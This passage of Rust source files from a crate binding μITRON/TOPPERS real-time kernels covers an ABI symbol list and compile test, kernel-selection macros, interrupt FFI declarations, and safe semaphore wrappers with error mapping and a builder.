        b.insert_func(symbols::known_funcs::rcv_pdq);
        b.insert_func(symbols::known_funcs::prcv_pdq);
        b.insert_func(symbols::known_funcs::trcv_pdq);
        b.insert_func(symbols::known_funcs::ini_pdq);
        b.insert_func(symbols::known_funcs::ref_pdq);
        // Mutexes
        b.insert_func(symbols::known_funcs::loc_mtx);
        b.insert_func(symbols::known_funcs::ploc_mtx);
        b.insert_func(symbols::known_funcs::tloc_mtx);
        b.insert_func(symbols::known_funcs::unl_mtx);
        b.insert_func(symbols::known_funcs::ini_mtx);
        b.insert_func(symbols::known_funcs::ref_mtx);
        // Spinlocks
        b.insert_func(symbols::known_funcs::loc_spn);
        b.insert_func(symbols::known_funcs::unl_spn);
        b.insert_func(symbols::known_funcs::try_spn);
        b.insert_func(symbols::known_funcs::ref_spn);
        // Fixed-size memory pools
        b.insert_func(symbols::known_funcs::get_mpf);
        b.insert_func(symbols::known_funcs::pget_mpf);
        b.insert_func(symbols::known_funcs::tget_mpf);
        b.insert_func(symbols::known_funcs::rel_mpf);
        b.insert_func(symbols::known_funcs::ini_mpf);
        b.insert_func(symbols::known_funcs::ref_mpf);
        // System time
        b.insert_func(symbols::known_funcs::set_tim);
        b.insert_func(symbols::known_funcs::get_tim);
        b.insert_func(symbols::known_funcs::adj_tim);
        b.insert_func(symbols::known_funcs::fch_hrt);
        // Cyclic handlers
        b.insert_func(symbols::known_funcs::sta_cyc);
        b.insert_func(symbols::known_funcs::msta_cyc);
        b.insert_func(symbols::known_funcs::stp_cyc);
        b.insert_func(symbols::known_funcs::ref_cyc);
        // Alarm handlers
        b.insert_func(symbols::known_funcs::sta_alm);
        b.insert_func(symbols::known_funcs::msta_alm);
        b.insert_func(symbols::known_funcs::stp_alm);
        b.insert_func(symbols::known_funcs::ref_alm);
        // System state management
        b.insert_func(symbols::known_funcs::rot_rdq);
        b.insert_func(symbols::known_funcs::mrot_rdq);
        b.insert_func(symbols::known_funcs::get_tid);
        b.insert_func(symbols::known_funcs::get_pid);
        b.insert_func(symbols::known_funcs::get_lod);
        b.insert_func(symbols::known_funcs::mget_lod);
        b.insert_func(symbols::known_funcs::get_nth);
        b.insert_func(symbols::known_funcs::mget_nth);
        b.insert_func(symbols::known_funcs::loc_cpu);
        b.insert_func(symbols::known_funcs::unl_cpu);
        b.insert_func(symbols::known_funcs::dis_dsp);
        b.insert_func(symbols::known_funcs::ena_dsp);
        b.insert_func(symbols::known_funcs::sns_ctx);
        b.insert_func(symbols::known_funcs::sns_loc);
        b.insert_func(symbols::known_funcs::sns_dsp);
        b.insert_func(symbols::known_funcs::sns_dpn);
        b.insert_func(symbols::known_funcs::sns_ker);
        b.insert_func(symbols::known_funcs::ext_ker);
        // Interrupt management
        b.insert_func(symbols::known_funcs::dis_int);
        b.insert_func(symbols::known_funcs::ena_int);
        b.insert_func(symbols::known_funcs::clr_int);
        b.insert_func(symbols::known_funcs::ras_int);
        b.insert_func(symbols::known_funcs::prb_int);
        b.insert_func(symbols::known_funcs::chg_ipm);
        b.insert_func(symbols::known_funcs::get_ipm);
        // CPU exception management
        b.insert_func(symbols::known_funcs::xsns_dpn);
    }
}
<file_sep>/tests/abi/main.rs
//! This test checks that `itron::abi`'s contents exactly match what the target
//! kernel provides.
//!
//! Note: This test is a little bit tricky to get working. `target/debug` must
//! be ridden of other copies of `itron*.rlib` compiled with different Cargo
//! feature sets.
#![cfg(not(feature = "none"))]
use std::{collections::HashSet, env, fmt::Write, fs, path::Path};
mod symbols;
/// Interface implemented by each target kernel's ABI description to report the
/// symbols that kernel provides.
trait KernelAbi {
    fn get_symbols(&self, b: &mut SymbolsBuilder);
}
/// Accumulates the symbols a kernel ABI declares.
#[derive(Default)]
struct SymbolsBuilder {
    // For now we are only interested in function names
    func_names: HashSet<&'static str>,
}
impl SymbolsBuilder {
    /// Records a function provided by the target kernel.
    fn insert_func(&mut self, f: symbols::Func) {
        self.func_names.insert(f.name);
    }
}
// Target kernels' ABI definitions
#[cfg(feature = "asp3")]
mod asp3;
#[cfg(feature = "asp3")]
use asp3 as os;
#[cfg(feature = "solid_asp3")]
mod solid_asp3;
#[cfg(feature = "solid_asp3")]
use solid_asp3 as os;
#[cfg(feature = "fmp3")]
mod fmp3;
#[cfg(feature = "fmp3")]
use fmp3 as os;
#[cfg(feature = "solid_fmp3")]
mod solid_fmp3;
#[cfg(feature = "solid_fmp3")]
use solid_fmp3 as os;
#[test]
fn abi_function_set() {
    let actual_abi = os::Abi;

    // Get the target kernel's provided symbols
    let mut actual_symbols = SymbolsBuilder::default();
    actual_abi.get_symbols(&mut actual_symbols);

    // Enumerate functions that are not supposed to exist
    // (known to some kernel, but not provided by the current one).
    let all_func_names: HashSet<&'static str> =
        symbols::known_funcs::ALL_NAMES.iter().cloned().collect();
    let bad_func_names = (&all_func_names) - (&actual_symbols.func_names);
    println!(
        "actual_symbols.func_names = {:?}",
        actual_symbols.func_names
    );
    println!(
        "bad_func_names (expected not to be in `itron::abi`) = {:?}",
        bad_func_names
    );

    // Generate compile tests in `$OUT_DIR`
    let out_dir = env::var_os("OUT_DIR").unwrap();
    let out_dir = Path::new(&out_dir);
    let pass_dir = out_dir.join("abi-test-pass");
    let fail_dir = out_dir.join("abi-test-fail");
    // Start from a clean slate; ignore errors if the directories don't exist.
    let _ = fs::remove_dir_all(&pass_dir);
    let _ = fs::remove_dir_all(&fail_dir);
    fs::create_dir_all(&pass_dir).unwrap();
    fs::create_dir_all(&fail_dir).unwrap();

    // Builds a Rust source string. `$dollar` receives a literal `$` token so
    // the inner `wln!` helper macro can be defined from within this macro.
    macro_rules! codegen {
        ($dollar:tt $($tt:tt)*) => {{
            let mut rs = String::new();
            macro_rules! wln { ($dollar($tt2:tt)*) => { writeln!(rs, $dollar($tt2)*).unwrap() }; }
            $($tt)*
            rs
        }};
    }

    // Pass test: referencing every provided function must compile.
    let pass_test = codegen! {$
        wln!("fn main() {{");
        for &func_name in actual_symbols.func_names.iter() {
            wln!(" let _ = itron::abi::{};", func_name);
        }
        wln!("}}");
    };
    fs::write(pass_dir.join("func_names.rs"), pass_test).unwrap();

    // Fail test: referencing any non-provided function must NOT compile.
    let fail_test = codegen! {$
        wln!("fn main() {{");
        for &func_name in bad_func_names.iter() {
            wln!(" let _ = itron::abi::{0}; //~ ERROR cannot find value `{0}` in module `itron::abi`", func_name);
        }
        wln!("}}");
    };
    fs::write(fail_dir.join("func_names.rs"), fail_test).unwrap();

    // Run compile tests
    let flags = "--edition=2018 --extern itron";
    {
        let mut config = compiletest::Config::default();
        config.mode = compiletest::common::Mode::RunPass;
        config.target_rustcflags = Some(flags.to_string());
        config.src_base = pass_dir.to_owned();
        config.link_deps();
        config.clean_rmeta();
        compiletest::run_tests(&config);
    }
    {
        let mut config = compiletest::Config::default();
        config.mode = compiletest::common::Mode::CompileFail;
        config.target_rustcflags = Some(flags.to_string());
        config.src_base = fail_dir.to_owned();
        config.link_deps();
        config.clean_rmeta();
        compiletest::run_tests(&config);
    }
}
<file_sep>/src/macros.rs
//! Provides macros that allow downstream crates to examine the choice of
//! the target kernel.
//!
//! This module's macros whose names start with `tt_` follow `tt-call`'s token
//! tree calling convention.
include!(concat!(env!("OUT_DIR"), "/macros.rs"));
// Make `tt_call` available to the following macros' expansion
#[doc(hidden)]
pub use tt_call;
/// Expand to the current kernel's name (e.g., `"asp3"`).
///
/// # Examples
///
/// ```rust
/// println!("We are running on {}", itron::macros::kernel!());
/// ```
///
/// ```rust,compile_fail
/// compile_error!(concat!("kernel `", itron::macros::kernel!(), "` is not supported"));
/// ```
pub macro kernel() {
    // Delegates to `tt_kernel`, which is generated into `$OUT_DIR/macros.rs`
    // (see the `include!` at the top of this module).
    tt_call::tt_call! { macro = [{ itron::macros::tt_kernel }] }
}
/// Expand to the arm corresponding to the current kernel.
///
/// # Example
///
/// ```rust
/// itron::macros::match_kernel! {
/// "asp3" | "solid_asp3" => { fn say() { println!("We are running on TOPPERS/ASP3, yay!"); } }
/// "nonexistent_kernel" => { call_nonexistent_function(); }
/// _ => { fn say() { println!("This kernel looks like something new!"); } }
/// }
/// say();
/// ```
///
/// The arms don't create local scopes, and unselected arms are eliminated
/// during an early stage of compilation. Compare to the following example:
///
/// ```rust,compile_fail
/// match itron::macros::kernel!() {
/// "asp3" | "solid_asp3" => { fn say() { println!("We are running on TOPPERS/ASP3, yay!"); } }
/// "nonexistent_kernel" => { call_nonexistent_function(); }
/// // ERROR: `call_nonexistent_function` is undefined
/// _ => { fn say() { println!("This kernel looks like something new!"); } }
/// }
/// say(); // ERROR: Each arm's `say` is not accessible from here
/// ```
///
pub macro match_kernel {
    // Terminal wildcard arm: always expands to its body.
    (
        _ => { $($wildcard:tt)* }
    ) => { $($wildcard)* },
    // A wildcard followed by more arms is a user error: the later arms
    // could never be selected. (Message grammar fixed.)
    (
        _ => { $($wildcard:tt)* }
        $($rest:tt)*
    ) => {
        compile_error!("anything that follows `_ => { ... }` never matches")
    },
    // One or more kernel names: expand the body if any name matches the
    // current kernel, otherwise recurse into the remaining arms.
    (
        $( $kernel:tt )|+ => { $($tt:tt)* }
        $($rest:tt)*
    ) => {
        tt_call::tt_if! {
            condition = [{ $crate::macros::tt_is_kernel }]
            input = [{ $( $kernel )|+ }]
            true = [{ $($tt)* }]
            false = [{
                match_kernel! { $($rest)* }
            }]
        }
    },
}
<file_sep>/src/abi/intr.rs
use super::{bool_t, ER, ER_BOOL, INTNO, PRI};
/*
 * Type definitions for processing units
 */
/// An interrupt service routine: a C-ABI function receiving the extended
/// information (`EXINF`) it was registered with; `None` means no routine.
pub type ISR = Option<unsafe extern "C" fn(super::EXINF)>;
/*
 * Definitions of other constants
 */
/// Interrupt priority mask fully cleared (all interrupt priorities unmasked)
pub const TIPM_ENAALL: PRI = 0;
/// TOPPERS/ASP3 and SOLID/FMP3 `T_CISR`
///
/// Creation parameter block for an interrupt service routine
/// (passed to `acre_isr`).
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CISR {
    /// Interrupt service routine attributes
    pub isratr: super::ATR,
    /// Extended information passed to the interrupt service routine
    pub exinf: super::EXINF,
    /// Interrupt number to register the interrupt service routine for
    pub intno: INTNO,
    /// Start address (entry point) of the interrupt service routine
    pub isr: ISR,
    /// Interrupt service routine priority
    pub isrpri: PRI,
}
/// Interrupt management functions
///
/// Standard μITRON/TOPPERS service calls for controlling interrupt
/// request lines and the interrupt priority mask.
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    /// Disables the specified interrupt.
    pub fn dis_int(intno: INTNO) -> ER;
    /// Enables the specified interrupt.
    pub fn ena_int(intno: INTNO) -> ER;
    /// Clears the pending state of the specified interrupt.
    pub fn clr_int(intno: INTNO) -> ER;
    /// Raises (requests) the specified interrupt.
    pub fn ras_int(intno: INTNO) -> ER;
    /// Probes whether the specified interrupt is pending.
    pub fn prb_int(intno: INTNO) -> ER_BOOL;
    /// Changes the interrupt priority mask of the calling context.
    pub fn chg_ipm(intpri: PRI) -> ER;
    /// Reads the current interrupt priority mask into `*p_intpri`.
    pub fn get_ipm(p_intpri: *mut PRI) -> ER;
}
/// Interrupt management functions (dynamic creation; requires `dcre`)
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
    /// Creates an interrupt service routine from `*pk_cisr`, returning its ID.
    pub fn acre_isr(pk_cisr: *const T_CISR) -> super::ER_ID;
    /// Deletes the interrupt service routine with the given ID.
    pub fn del_isr(isrid: super::ID) -> ER;
}
/// CPU exception management functions
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    // Checks, from CPU exception information `p_excinf`, whether the
    // exception occurred in a dispatch-pending state.
    pub fn xsns_dpn(p_excinf: *mut u8) -> bool_t;
}
<file_sep>/src/semaphore.rs
//! Semaphores
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
    /// Error type for [`SemaphoreRef::signal`].
    pub enum SignalError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never holds: this variant is compiled out on every
        // kernel (presumably reserved for kernels with access control).
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        QueueOverflow,
    }
}
impl ErrorKind for SignalError {
    // Maps a raw kernel error code to a variant; returns `None` for codes
    // this operation is not expected to produce.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            // Both E_ID (invalid ID) and E_NOEXS (object does not exist)
            // collapse into `BadId`.
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`SemaphoreRef::wait`].
    pub enum WaitError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never holds: variant compiled out on every kernel.
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        // Only possible when objects can be deleted at runtime (`dcre`).
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
    }
}
impl ErrorKind for WaitError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::wait_timeout`].
pub enum WaitTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for WaitTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::poll`].
pub enum PollError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for PollError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::initialize`].
pub enum InitializeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InitializeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::info`].
pub enum InfoError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InfoError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`Semaphore::build`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum BuildError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
/// Ran out of semaphore IDs.
#[cfg(not(feature = "none"))]
OutOfMemory,
/// Bad parameter.
#[cfg(not(feature = "none"))]
BadParam,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACV` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_NOID => Some(Self::OutOfMemory(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::delete`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum DeleteError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
BadState,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
/// Semaphore count.
pub type Count = u32;
/// Semaphore information returned by [`SemaphoreRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
    // Raw `T_RSEM` snapshot filled in by `ref_sem`.
    #[cfg(not(feature = "none"))]
    raw: abi::T_RSEM,
}
impl Info {
    /// Get the semaphore's count.
    #[inline]
    pub fn count(&self) -> Count {
        match () {
            #[cfg(not(feature = "none"))]
            () => self.raw.semcnt,
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get the first waiting task's ID, if any.
    #[inline]
    pub fn first_waiting_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.wtskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// A borrowed reference to a semaphore.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct SemaphoreRef<'a> {
    // Raw kernel object ID; `'a` limits how long the reference may be used.
    id: abi::NonNullID,
    _phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for SemaphoreRef<'_> {
    /// Render the reference as `Semaphore(<id>)`.
    fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result {
        formatter.write_fmt(format_args!("Semaphore({})", self.id))
    }
}
/// # Object ID conversion
impl SemaphoreRef<'_> {
    /// Construct a `SemaphoreRef` from a raw object ID.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
        Self {
            id,
            _phantom: PhantomData,
        }
    }
    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(self) -> abi::ID {
        self.id.get()
    }
    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(self) -> abi::NonNullID {
        self.id
    }
}
/// # Management
impl SemaphoreRef<'_> {
    /// `del_sem`: Delete the semaphore.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    #[doc(alias = "del_sem")]
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::del_sem(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ref_sem`: Get the semaphore's general information.
    #[inline]
    #[doc(alias = "ref_sem")]
    pub fn info(self) -> Result<Info, Error<InfoError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                let mut pri = MaybeUninit::uninit();
                Error::err_if_negative(abi::ref_sem(self.as_raw(), pri.as_mut_ptr()))?;
                // Safety: `ref_sem` succeeded, so it filled `pri` in.
                Ok(Info {
                    raw: pri.assume_init(),
                })
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// # Semaphore Operations
impl SemaphoreRef<'_> {
    /// `sig_sem`: Increment the semaphore count by one.
    #[inline]
    #[doc(alias = "sig_sem")]
    pub fn signal(self) -> Result<(), Error<SignalError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::sig_sem(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `wai_sem`: Decrement the semaphore count by one. Blocks the current
    /// task if the new value is negative.
    #[inline]
    #[doc(alias = "wai_sem")]
    pub fn wait(self) -> Result<(), Error<WaitError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::wai_sem(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `twai_sem`: Decrement the semaphore count by one. Blocks the current
    /// task with timeout if the new value is negative.
    #[inline]
    #[doc(alias = "twai_sem")]
    pub fn wait_timeout(self, tmo: Timeout) -> Result<(), Error<WaitTimeoutError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::twai_sem(self.as_raw(), tmo.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `pol_sem`: Decrement the semaphore count by one. Fails and returns
    /// immediately if the new value is negative.
    #[inline]
    #[doc(alias = "pol_sem")]
    pub fn poll(self) -> Result<(), Error<PollError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::pol_sem(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ini_sem`: Initialize the semaphore.
    #[inline]
    #[doc(alias = "ini_sem")]
    pub fn initialize(self) -> Result<(), Error<InitializeError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::ini_sem(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
    use super::*;
    use crate::wait::QueueOrder;
    /// The builder type for [semaphores](Semaphore). Created by [`Semaphore::build`].
    ///
    /// Its generic parameters are an implementation detail.
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    #[must_use = "`Builder` creates nothing unless you call `.finish()`"]
    pub struct Builder {
        // `true` until `initial_count` is called; `finish` then defaults
        // the initial count (`isemcnt`) to the maximum count (`maxsem`).
        initial_default: bool,
        #[cfg(not(feature = "none"))]
        raw: abi::T_CSEM,
    }
    impl Semaphore {
        /// `acre_sem`: Create a builder for `Semaphore`.
        ///
        /// # Examples
        ///
        /// ```rust,no_run
        /// use itron::semaphore::Semaphore;
        /// let binary_semaphore = Semaphore::build()
        ///    .finish()
        ///    .expect("failed to create a semaphore");
        ///
        /// binary_semaphore.as_ref().wait()
        ///     .expect("failed to perform a wait operation");
        /// binary_semaphore.as_ref().signal()
        ///     .expect("failed to perform a signal operation");
        /// ```
        ///
        /// ```rust,no_run
        /// use itron::{semaphore::Semaphore, wait::QueueOrder};
        /// let counting_semaphore = Semaphore::build()
        ///    .initial_count(4)
        ///    .max_count(8)
        ///    .queue_order(QueueOrder::TaskPriority)
        ///    .finish()
        ///    .expect("failed to create a semaphore");
        ///
        /// for _ in 0..4 {
        ///     counting_semaphore.as_ref().poll()
        ///         .expect("failed to perform a polling wait operation");
        /// }
        /// counting_semaphore.as_ref().poll()
        ///     .expect_err("unexpectedly succeeded to perform a polling wait operation");
        ///
        /// for _ in 0..8 {
        ///     counting_semaphore.as_ref().signal()
        ///         .expect("failed to perform a signal operation");
        /// }
        /// counting_semaphore.as_ref().signal()
        ///     .expect_err("unexpectedly succeeded to perform a signal operation");
        /// ```
        #[inline]
        #[doc(alias = "acre_sem")]
        pub fn build() -> Builder {
            Builder {
                initial_default: true,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CSEM {
                    sematr: abi::TA_NULL,
                    isemcnt: 0,
                    maxsem: 1,
                },
            }
        }
    }
    impl Builder {
        /// Specify the initial count. Defaults to `max_count` when unspecified.
        #[inline]
        pub fn initial_count(self, value: Count) -> Builder {
            Builder {
                initial_default: false,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CSEM {
                    isemcnt: value,
                    ..self.raw
                },
            }
        }
        /// Specify the maximum count. Defaults to `1` when unspecified.
        #[inline]
        pub fn max_count(self, value: Count) -> Builder {
            Builder {
                #[cfg(not(feature = "none"))]
                raw: abi::T_CSEM {
                    maxsem: value,
                    ..self.raw
                },
                ..self
            }
        }
        /// Specify the queue order. Defaults to `Fifo` when unspecified.
        #[inline]
        pub fn queue_order(self, value: QueueOrder) -> Builder {
            Builder {
                #[cfg(not(feature = "none"))]
                raw: abi::T_CSEM {
                    sematr: value.as_raw_atr(),
                    ..self.raw
                },
                ..self
            }
        }
    }
    impl Builder {
        /// Create a semaphore using the specified parameters.
        #[allow(unused_mut)]
        pub fn finish(mut self) -> Result<Semaphore, Error<BuildError>> {
            // If no initial count was given, start the semaphore full.
            #[cfg(not(feature = "none"))]
            if self.initial_default {
                self.raw.isemcnt = self.raw.maxsem;
            }
            match () {
                #[cfg(not(feature = "none"))]
                () => unsafe {
                    let id = Error::err_if_negative(abi::acre_sem(&self.raw))?;
                    // Safety: We own the semaphore we create
                    Ok(Semaphore::from_raw_nonnull(abi::NonNullID::new_unchecked(
                        id,
                    )))
                },
                #[cfg(feature = "none")]
                () => unimplemented!(),
            }
        }
    }
    /// An owned semaphore.
    ///
    /// [Deletes] the semaphore automatically when dropped. The destructor will
    /// panic if the deletion fails.
    ///
    /// [Deletes]: SemaphoreRef::delete
    #[derive(PartialEq, Eq)]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub struct Semaphore(SemaphoreRef<'static>);
    impl fmt::Debug for Semaphore {
        #[inline]
        fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
            self.0.fmt(f)
        }
    }
